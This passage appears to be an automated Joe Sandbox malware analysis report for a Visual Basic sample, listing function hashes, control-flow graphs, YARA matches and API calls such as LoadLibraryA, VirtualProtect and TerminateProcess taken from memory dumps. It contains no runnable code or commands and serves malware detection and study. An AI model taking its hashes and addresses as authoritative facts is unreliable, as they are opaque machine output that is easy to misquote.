                                                                                                                          • API ID: __vba$Free$CheckHresultNew2$#645Move
                                                                                                                          • String ID: Ligegodt2
                                                                                                                          • API String ID: 849906774-2200858921
                                                                                                                          • Opcode ID: 975cf3d7f45bd02f2042760a2ecbbb8d7be647d7dd69bb2b569cf4ca8f249633
                                                                                                                          • Instruction ID: aebb2009344ea3902930888327dc30f4699e9c7ef4335fc7673b645bd6dd503d
                                                                                                                          • Opcode Fuzzy Hash: 975cf3d7f45bd02f2042760a2ecbbb8d7be647d7dd69bb2b569cf4ca8f249633
                                                                                                                          • Instruction Fuzzy Hash: A5414CB4A00218EFCB14DFA4DD88E9EBBB8FF48700F10852AF945B7291D7745945CB98
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 2095 231bf1c-231bfcc call 231bf5c 2100 231bfd2-231c025 call 231c88b call 231ebec 2095->2100 2101 231f3ee-231f4b1 2095->2101 2116 231e546-231e553 call 231c02c 2100->2116 2104 231f4b3-231f4e1 call 231fcc1 call 231f542 2101->2104 2105 231f4e4-231f53d LoadLibraryA call 231f542 2101->2105 2104->2105 2121 231e555 2116->2121 2122 231e51e-231e520 2116->2122 2121->2101 2123 231e518 2121->2123 2124 231e522 2122->2124 2125 231e4bf-231e4c0 2122->2125 2123->2116 2124->2116 2126 231e4a2 2125->2126 2127 231e4c2-231e4c4 2125->2127 2130 231e4a9-231e4ae 2126->2130 2128 231e463 2127->2128 2129 231e4c6 2127->2129 2128->2130 2131 231e4f0-231e509 call 231c7b8 2129->2131 2130->2131 2131->2123
                                                                                                                          APIs
                                                                                                                          • LoadLibraryA.KERNELBASE(?,?,?,4A82DAC6,023104DF,16EF18E8,0231E3FE,00000000,0231042E), ref: 0231F4E6
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000002.00000002.47312005259.0000000002310000.00000040.00000001.sdmp, Offset: 02310000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_2_2_2310000_Zr26f1rL6r.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: LibraryLoad
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1029625771-0
                                                                                                                          • Opcode ID: 4dde117c9ab0f498474159960d817822d2740f54e3fa7f55f575a93b40af4ef9
                                                                                                                          • Instruction ID: 2906d8c82db5adb5142cae07adc322d6b30304c444fa37a7d23bafda94b97cf8
                                                                                                                          • Opcode Fuzzy Hash: 4dde117c9ab0f498474159960d817822d2740f54e3fa7f55f575a93b40af4ef9
                                                                                                                          • Instruction Fuzzy Hash: 21417B7620435ADFCB389F684CF43DB2366AF957F0F90031BCC6A9B582DB3689458652
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 2134 231be04-231bea8 call 231c88b 2139 231f3ee-231f4b1 2134->2139 2140 231beae-231c025 call 231bede call 231ebec 2134->2140 2144 231f4b3-231f4e1 call 231fcc1 call 231f542 2139->2144 2145 231f4e4-231f53d LoadLibraryA call 231f542 2139->2145 2157 231e546-231e553 call 231c02c 2140->2157 2144->2145 2161 231e555 2157->2161 2162 231e51e-231e520 2157->2162 2161->2139 2163 231e518 2161->2163 2164 231e522 2162->2164 2165 231e4bf-231e4c0 2162->2165 2163->2157 2164->2157 2166 231e4a2 2165->2166 2167 231e4c2-231e4c4 2165->2167 2170 231e4a9-231e4ae 2166->2170 2168 231e463 2167->2168 2169 231e4c6 2167->2169 2168->2170 2171 231e4f0-231e509 call 231c7b8 2169->2171 2170->2171 2171->2163
                                                                                                                          APIs
                                                                                                                          • LoadLibraryA.KERNELBASE(?,?,?,4A82DAC6,023104DF,16EF18E8,0231E3FE,00000000,0231042E), ref: 0231F4E6
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000002.00000002.47312005259.0000000002310000.00000040.00000001.sdmp, Offset: 02310000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_2_2_2310000_Zr26f1rL6r.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: LibraryLoad
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1029625771-0
                                                                                                                          • Opcode ID: 72ba87792771cc4dd5f6310a94303021875a3260cf59806d4016084067a7ab69
                                                                                                                          • Instruction ID: 280167148f8d3807ab1302a21e41638414919d66cff308fca2bb9b268000c50e
                                                                                                                          • Opcode Fuzzy Hash: 72ba87792771cc4dd5f6310a94303021875a3260cf59806d4016084067a7ab69
                                                                                                                          • Instruction Fuzzy Hash: FA318876604359DBCF382F349CA03EA636BAF85BA0F91051FDC469BA41E7318D80CB52
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 2174 231c02c-231c114 call 231c0b3 call 231c88b call 231ebec 2183 231c11a-231c11b 2174->2183 2184 231f3ee-231f4b1 2174->2184 2183->2184 2186 231f4b3-231f4e1 call 231fcc1 call 231f542 2184->2186 2187 231f4e4-231f53d LoadLibraryA call 231f542 2184->2187 2186->2187
                                                                                                                          APIs
                                                                                                                          • LoadLibraryA.KERNELBASE(?,?,?,4A82DAC6,023104DF,16EF18E8,0231E3FE,00000000,0231042E), ref: 0231F4E6
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000002.00000002.47312005259.0000000002310000.00000040.00000001.sdmp, Offset: 02310000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_2_2_2310000_Zr26f1rL6r.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: LibraryLoad
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1029625771-0
                                                                                                                          • Opcode ID: 32ec042b3a3ff8751d5e3830c917f679b5f0892ab36ffb89ee1e3e064fc07b13
                                                                                                                          • Instruction ID: 4df3f3f008f20e084b2283c4667ab88a681f46d351543f1bd1c7f99106b58691
                                                                                                                          • Opcode Fuzzy Hash: 32ec042b3a3ff8751d5e3830c917f679b5f0892ab36ffb89ee1e3e064fc07b13
                                                                                                                          • Instruction Fuzzy Hash: D4318C766003189BCF38AE264D943DE277BAFD4790FAA8417DC09DB601D731CD468A51
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 2195 231f3ee-231f4b1 2197 231f4b3-231f4e1 call 231fcc1 call 231f542 2195->2197 2198 231f4e4-231f53d LoadLibraryA call 231f542 2195->2198 2197->2198
                                                                                                                          APIs
                                                                                                                          • LoadLibraryA.KERNELBASE(?,?,?,4A82DAC6,023104DF,16EF18E8,0231E3FE,00000000,0231042E), ref: 0231F4E6
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000002.00000002.47312005259.0000000002310000.00000040.00000001.sdmp, Offset: 02310000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_2_2_2310000_Zr26f1rL6r.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: LibraryLoad
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1029625771-0
                                                                                                                          • Opcode ID: 3ab1af08f2225e6075ab4171d93c1445c702b81fa469aa8eeef3256d0b180e45
                                                                                                                          • Instruction ID: 4802b955aac0d5425a0eb79970221d68e347739a2e1f974f2758745a6f022c85
                                                                                                                          • Opcode Fuzzy Hash: 3ab1af08f2225e6075ab4171d93c1445c702b81fa469aa8eeef3256d0b180e45
                                                                                                                          • Instruction Fuzzy Hash: D5118E716013299BCF346F2559A43CB237AAFC8790FA5401BDC49DB601DB71CD418B51
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 2206 2313800-2313858 2209 2313a62-231c1ca TerminateProcess 2206->2209 2210 231385e-2313876 call 2315ee3 2206->2210
                                                                                                                          APIs
                                                                                                                          • TerminateProcess.KERNELBASE ref: 0231C1BE
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000002.00000002.47312005259.0000000002310000.00000040.00000001.sdmp, Offset: 02310000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_2_2_2310000_Zr26f1rL6r.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: ProcessTerminate
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 560597551-0
                                                                                                                          • Opcode ID: fef95deefe1bdea80e374594cdcf887aad249fa194f619d99be148cb413548ad
                                                                                                                          • Instruction ID: 63ace5413893efa4cdf7f6898d8a4507fd651791bcc273fb7469812882a2f387
                                                                                                                          • Opcode Fuzzy Hash: fef95deefe1bdea80e374594cdcf887aad249fa194f619d99be148cb413548ad
                                                                                                                          • Instruction Fuzzy Hash: 920126355D834ACBCB18AE3085823EDB7A5EF51360F96556CCCD267446D72540CACF03
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 2218 4013b4-4013b9 #100 2219 4013be-4013dc 2218->2219
                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000002.00000002.47310862985.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000002.00000002.47310843756.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000002.00000002.47311008132.0000000000420000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000002.00000002.47311035451.0000000000422000.00000002.00020000.sdmp Download File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Zr26f1rL6r.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: #100
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1341478452-0
                                                                                                                          • Opcode ID: 3dce9b3da0484dfc767d3d1118ca09d2460f8d38d850699b4a84e8edd8a7beb3
                                                                                                                          • Instruction ID: 84cf40644059cba91e8f92e1df72062d9aa4bec08f084cf555762f4b0e6bb3ab
                                                                                                                          • Opcode Fuzzy Hash: 3dce9b3da0484dfc767d3d1118ca09d2460f8d38d850699b4a84e8edd8a7beb3
                                                                                                                          • Instruction Fuzzy Hash: B3E024A0A8F3D16EE70323700C255167F748E5B64031F54EBC182EB4F3D0690849C33A
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Non-executed Functions

                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000002.00000002.47312005259.0000000002310000.00000040.00000001.sdmp, Offset: 02310000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_2_2_2310000_Zr26f1rL6r.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: LibraryLoadMemoryProtectVirtual
                                                                                                                          • String ID: *5dz$D4Z$EK]
                                                                                                                          • API String ID: 3389902171-1474308881
                                                                                                                          • Opcode ID: 4c25ad8e37d00b6a388c9c883b9f8fe96e4ff8592503b7824071069bce639471
                                                                                                                          • Instruction ID: 6dabfbcadd94453f88611804e7ab1202345823b70461113546f90eb36b37d58d
                                                                                                                          • Opcode Fuzzy Hash: 4c25ad8e37d00b6a388c9c883b9f8fe96e4ff8592503b7824071069bce639471
                                                                                                                          • Instruction Fuzzy Hash: 2E624B315083868FDF358F3889987DB7BA2AF56360F4982AECCD98F596D3318546C712
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          • LoadLibraryA.KERNELBASE(?,?,?,4A82DAC6,023104DF,16EF18E8,0231E3FE,00000000,0231042E), ref: 0231F4E6
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000002.00000002.47312005259.0000000002310000.00000040.00000001.sdmp, Offset: 02310000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_2_2_2310000_Zr26f1rL6r.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: LibraryLoad
                                                                                                                          • String ID: H+m$}#c
                                                                                                                          • API String ID: 1029625771-2095270229
                                                                                                                          • Opcode ID: f318be4968c694413733821e36e23b0712838428202f1cf5ed69a111eaabc949
                                                                                                                          • Instruction ID: 6ff51f64cd888880b161d7e90896e5489ab015a374b1a03a9d22b5189e165947
                                                                                                                          • Opcode Fuzzy Hash: f318be4968c694413733821e36e23b0712838428202f1cf5ed69a111eaabc949
                                                                                                                          • Instruction Fuzzy Hash: F68115717043098FEB389E398EA57EB7BB7EF85350F95811DDD8A87148D3358485CA02
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000002.00000002.47312005259.0000000002310000.00000040.00000001.sdmp, Offset: 02310000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_2_2_2310000_Zr26f1rL6r.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: `rE
                                                                                                                          • API String ID: 0-770150655
                                                                                                                          • Opcode ID: 96df2268e55ba0e22f83ecce8ae5bb83bc3889e052646db66442caa01f07f649
                                                                                                                          • Instruction ID: 53e12de9df3619502fe841a80ba2f07e9d47986baa5ffd84a4cdef4d3011b4af
                                                                                                                          • Opcode Fuzzy Hash: 96df2268e55ba0e22f83ecce8ae5bb83bc3889e052646db66442caa01f07f649
                                                                                                                          • Instruction Fuzzy Hash: 2F115171300785DFCB38DE28C9D4BEB73A2AF99750F56856ADC0A8BA19C331D941CB21
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000002.00000002.47312005259.0000000002310000.00000040.00000001.sdmp, Offset: 02310000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_2_2_2310000_Zr26f1rL6r.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: vm
                                                                                                                          • API String ID: 0-3678984662
                                                                                                                          • Opcode ID: 411d2ccf735ade96d674fbf4149d11b1c188fc96c0c81393bd6a416fca3f7862
                                                                                                                          • Instruction ID: b8b9fcafd7fc8235984e8261b0abeba9e7ae6fafe313212b3e61da6b8016b76b
                                                                                                                          • Opcode Fuzzy Hash: 411d2ccf735ade96d674fbf4149d11b1c188fc96c0c81393bd6a416fca3f7862
                                                                                                                          • Instruction Fuzzy Hash: E4C08076B0E0B74E0FF52478375415764429BD5614F17C6905876F394CD940CECD4C43
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000002.00000002.47312005259.0000000002310000.00000040.00000001.sdmp, Offset: 02310000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_2_2_2310000_Zr26f1rL6r.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 08f77bc36bc36a33d5dd8b9a489b757c6dd11c041e9349af78a4cb13a0a0ada5
                                                                                                                          • Instruction ID: d3730bf44bac115e09534f6df03ea8ee0d496b340848c6b32338773f956a5f58
                                                                                                                          • Opcode Fuzzy Hash: 08f77bc36bc36a33d5dd8b9a489b757c6dd11c041e9349af78a4cb13a0a0ada5
                                                                                                                          • Instruction Fuzzy Hash: F851E132548288CFC73D4F74DC953CA7F60EF86314F681A9EC9988B952C2289C47C781
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000002.00000002.47312005259.0000000002310000.00000040.00000001.sdmp, Offset: 02310000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_2_2_2310000_Zr26f1rL6r.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: LibraryLoad
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1029625771-0
                                                                                                                          • Opcode ID: 409a5f5028d64aafd07f3c2cde1e0d623dfa3841b60148134ded317e31afbc55
                                                                                                                          • Instruction ID: 28e3451949757b3fdd123aa6307080d8eb57e3ee79e07672b57f260373778c51
                                                                                                                          • Opcode Fuzzy Hash: 409a5f5028d64aafd07f3c2cde1e0d623dfa3841b60148134ded317e31afbc55
                                                                                                                          • Instruction Fuzzy Hash: 3A5136746043068FDB18CE24C5E47AA739AAF81350F65C5ADDC898B665C73EC88ACA15
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000002.00000002.47310862985.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000002.00000002.47310843756.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000002.00000002.47311008132.0000000000420000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000002.00000002.47311035451.0000000000422000.00000002.00020000.sdmp Download File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Zr26f1rL6r.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 58187ee0e133b0b48bb3efed7ac890b15464e5e05c24970065dea5c804966976
                                                                                                                          • Instruction ID: d394a65342a6a254380257ba0734a19f866dc21ad068f5b1ddaac111a7468d93
                                                                                                                          • Opcode Fuzzy Hash: 58187ee0e133b0b48bb3efed7ac890b15464e5e05c24970065dea5c804966976
                                                                                                                          • Instruction Fuzzy Hash: F641279025E2D4EFC71B47B64CBA2813FE1AE07108B1A88EFD6D54B8A3E555241FC727
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000002.00000002.47312005259.0000000002310000.00000040.00000001.sdmp, Offset: 02310000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_2_2_2310000_Zr26f1rL6r.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 78620046c859d98c365753b2ba2a2a77835b8632657ca603a338d3e691fd27c4
                                                                                                                          • Instruction ID: f742258c29c96eb301f3374961b86f2f507bb876785437620c778b97528bce72
                                                                                                                          • Opcode Fuzzy Hash: 78620046c859d98c365753b2ba2a2a77835b8632657ca603a338d3e691fd27c4
                                                                                                                          • Instruction Fuzzy Hash: 8841FC326566088BD7199F78C504ADA7BF6DF80310F505B4EC6559BA0AC334AC12C7C2
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000002.00000002.47312005259.0000000002310000.00000040.00000001.sdmp, Offset: 02310000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_2_2_2310000_Zr26f1rL6r.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: LibraryLoad
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1029625771-0
                                                                                                                          • Opcode ID: 8e31eb5ad49c94e43c815688fe01767b795d8aff5dcdc482044425ef0efeafd4
                                                                                                                          • Instruction ID: 1c212c31a8913984749a04b9d96d02a4f9de175d7f170807c21293d8bec752dd
                                                                                                                          • Opcode Fuzzy Hash: 8e31eb5ad49c94e43c815688fe01767b795d8aff5dcdc482044425ef0efeafd4
                                                                                                                          • Instruction Fuzzy Hash: A831BF719092C69FC70ECF3898552D6BFB1EF87214B190AAECAC8CF517D622480BCB54
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000002.00000002.47310862985.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000002.00000002.47310843756.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000002.00000002.47311008132.0000000000420000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000002.00000002.47311035451.0000000000422000.00000002.00020000.sdmp Download File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Zr26f1rL6r.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 9e24cef5b52d058c6559a4647f5f96652dbae51e6763f7f5d8b23a4fe3d590a8
                                                                                                                          • Instruction ID: 0ef76ab4ed2bcdf07a831812e9108315abc5032b0251afc9fc56c28be75d868b
                                                                                                                          • Opcode Fuzzy Hash: 9e24cef5b52d058c6559a4647f5f96652dbae51e6763f7f5d8b23a4fe3d590a8
                                                                                                                          • Instruction Fuzzy Hash: 5E11DAB150E3E59FCB174B748CB52527FB0AF1B20070A44EBD4819F8A7E268281ED727
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000002.00000002.47310862985.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000002.00000002.47310843756.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000002.00000002.47311008132.0000000000420000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000002.00000002.47311035451.0000000000422000.00000002.00020000.sdmp Download File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Zr26f1rL6r.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 072463a7c437865975a3864d9424ff10385e28a77ccb1411e9edc6cac81fba01
                                                                                                                          • Instruction ID: 3a4f40afd7daac755765d0dbc513794409bb1d663c47dbf88c845af7c1cdfe86
                                                                                                                          • Opcode Fuzzy Hash: 072463a7c437865975a3864d9424ff10385e28a77ccb1411e9edc6cac81fba01
                                                                                                                          • Instruction Fuzzy Hash: CBF07A70124154EFCB06CF74D8A5A063BE1AF5B3407451CDAD9108F475D736B865EB12
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000002.00000002.47312005259.0000000002310000.00000040.00000001.sdmp, Offset: 02310000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_2_2_2310000_Zr26f1rL6r.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: f74a65d4059a1ebda17d342bd04d492b7f102559611f1bf076c1d81f5999dcb0
                                                                                                                          • Instruction ID: 2b6a72cd7021bf0c3b12a364decba313c58299517665f3af0cb5e473ee0c79a8
                                                                                                                          • Opcode Fuzzy Hash: f74a65d4059a1ebda17d342bd04d492b7f102559611f1bf076c1d81f5999dcb0
                                                                                                                          • Instruction Fuzzy Hash: C2B092303616808FC756DE19C195F8173B0FF00E80F8249C8E8118BA12C368EA008A20
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          • __vbaNew2.MSVBVM60(00403488,004204D8), ref: 0041B0E4
                                                                                                                          • __vbaHresultCheckObj.MSVBVM60(00000000,0234EA7C,00403478,00000014), ref: 0041B109
                                                                                                                          • __vbaHresultCheckObj.MSVBVM60(00000000,?,00403498,00000060), ref: 0041B12D
                                                                                                                          • __vbaStrCat.MSVBVM60(?,About ), ref: 0041B141
                                                                                                                          • __vbaStrMove.MSVBVM60 ref: 0041B152
                                                                                                                          • __vbaHresultCheckObj.MSVBVM60(00000000,?,00402E04,00000054), ref: 0041B16E
                                                                                                                          • __vbaFreeStrList.MSVBVM60(00000002,?,?), ref: 0041B182
                                                                                                                          • __vbaFreeObj.MSVBVM60 ref: 0041B18E
                                                                                                                          • __vbaObjSet.MSVBVM60(?,00000000), ref: 0041B1A2
                                                                                                                          • __vbaNew2.MSVBVM60(00403488,004204D8), ref: 0041B1C1
                                                                                                                          • __vbaHresultCheckObj.MSVBVM60(00000000,0234EA7C,00403478,00000014), ref: 0041B1E6
                                                                                                                          • __vbaHresultCheckObj.MSVBVM60(00000000,?,00403498,000000B8), ref: 0041B20C
                                                                                                                          • __vbaNew2.MSVBVM60(00403488,004204D8), ref: 0041B221
                                                                                                                          • __vbaHresultCheckObj.MSVBVM60(00000000,0234EA7C,00403478,00000014), ref: 0041B246
                                                                                                                          • __vbaHresultCheckObj.MSVBVM60(00000000,?,00403498,000000C0), ref: 0041B26C
                                                                                                                          • __vbaNew2.MSVBVM60(00403488,004204D8), ref: 0041B281
                                                                                                                          • __vbaHresultCheckObj.MSVBVM60(00000000,0234EA7C,00403478,00000014), ref: 0041B2A6
                                                                                                                          • __vbaHresultCheckObj.MSVBVM60(00000000,?,00403498,000000C8), ref: 0041B2CC
                                                                                                                          • __vbaStrI2.MSVBVM60(?,Version ), ref: 0041B2DF
                                                                                                                          • __vbaStrMove.MSVBVM60 ref: 0041B2EA
                                                                                                                          • __vbaStrCat.MSVBVM60(00000000), ref: 0041B2F3
                                                                                                                          • __vbaStrMove.MSVBVM60 ref: 0041B2FA
                                                                                                                          • __vbaStrCat.MSVBVM60(004034C4,00000000), ref: 0041B302
                                                                                                                          • __vbaStrMove.MSVBVM60 ref: 0041B309
                                                                                                                          • __vbaStrI2.MSVBVM60(?,00000000), ref: 0041B310
                                                                                                                          • __vbaStrMove.MSVBVM60 ref: 0041B31B
                                                                                                                          • __vbaStrCat.MSVBVM60(00000000), ref: 0041B31E
                                                                                                                          • __vbaStrMove.MSVBVM60 ref: 0041B325
                                                                                                                          • __vbaStrCat.MSVBVM60(004034C4,00000000), ref: 0041B32D
                                                                                                                          • __vbaStrMove.MSVBVM60 ref: 0041B334
                                                                                                                          • __vbaStrI2.MSVBVM60(?,00000000), ref: 0041B33B
                                                                                                                          • __vbaStrMove.MSVBVM60 ref: 0041B346
                                                                                                                          • __vbaStrCat.MSVBVM60(00000000), ref: 0041B349
                                                                                                                          • __vbaStrMove.MSVBVM60 ref: 0041B350
                                                                                                                          • __vbaHresultCheckObj.MSVBVM60(00000000,?,004034C8,00000054), ref: 0041B372
                                                                                                                          • __vbaFreeStrList.MSVBVM60(00000008,?,?,?,?,?,?,?,?), ref: 0041B39E
                                                                                                                          • __vbaFreeObjList.MSVBVM60(00000004,?,?,?,?), ref: 0041B3B6
                                                                                                                          • __vbaNew2.MSVBVM60(00403488,004204D8), ref: 0041B3D2
                                                                                                                          • __vbaHresultCheckObj.MSVBVM60(00000000,0234EA7C,00403478,00000014), ref: 0041B3F7
                                                                                                                          • __vbaHresultCheckObj.MSVBVM60(00000000,?,00403498,00000060), ref: 0041B417
                                                                                                                          • __vbaVarLateMemSt.MSVBVM60(?,Caption), ref: 0041B44D
                                                                                                                          • __vbaFreeObj.MSVBVM60 ref: 0041B456
                                                                                                                          • __vbaFreeVar.MSVBVM60 ref: 0041B45F
                                                                                                                          • __vbaFreeVar.MSVBVM60(0041B4C3), ref: 0041B4BC
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000002.00000002.47310862985.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000002.00000002.47310843756.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000002.00000002.47311008132.0000000000420000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000002.00000002.47311035451.0000000000422000.00000002.00020000.sdmp Download File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Zr26f1rL6r.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: __vba$CheckHresult$Move$Free$New2$List$Late
                                                                                                                          • String ID: About $Caption$Version
                                                                                                                          • API String ID: 760940201-2818086185
                                                                                                                          • Opcode ID: 882defc9a301ef7908dc681ee1135a14bf45d88bb0d58b1aa2110035774394c4
                                                                                                                          • Instruction ID: 59cc00b6a757b89c4aaec9fdd6ae4edb412b36b00a03ebdf9567368346b1527a
                                                                                                                          • Opcode Fuzzy Hash: 882defc9a301ef7908dc681ee1135a14bf45d88bb0d58b1aa2110035774394c4
